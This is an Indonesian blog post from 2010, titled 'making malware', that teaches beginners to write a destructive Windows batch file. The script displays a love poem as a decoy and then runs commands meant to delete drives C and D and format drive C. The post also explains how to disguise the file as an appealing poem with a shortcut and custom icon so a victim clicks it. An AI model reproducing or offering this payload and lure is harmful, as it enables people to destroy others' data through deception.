Senin, 29 Maret 2010

membuat malware

sekedar buat yang bener2 pemula yang pingin buat malware (virus)..

1. siapkan notepad
2. siapkan mental dan nyali karena ini akan menyangkut harkat dan martabat(^^??????)
3. copy ato tulis aja de di notepad ni script..
@echo off
echo. (-ini buat ganti baris)
echo Engkau adalah saat terindah dalam hidupku
echo Yang mencuri hatiku hingga sekarang aku tak punya hati lagi..(bla-bla-bla-lah buat dengan gayamu sendiri de tu puisi, ! inget tulisnya setelah echo ya..) DEL C:\ -y ( script buat del drive c)
DEL D:\ -y ( script buat del drive d)
FORMAT C:\ -y (script buat format c)

kalo uda simpan pake nama apapun yang penting menarik dengan format *.bat, (misalnya : puisi.bat). uda jadi tu “virus”..
cara kerjanya ialah kita mengundang si user buat ngeklik tu virus..bikin sesuai kreatifitasmu..misalnya seperti di bikin short cutnya dan di ganti iconnya dengan icon yang menarik ato gimana-gimana..

oke..cuma pingin bagi2 ilmu..biar gak ilang di telan pikiran sendiri ^^

Tidak ada komentar:

Poskan Komentar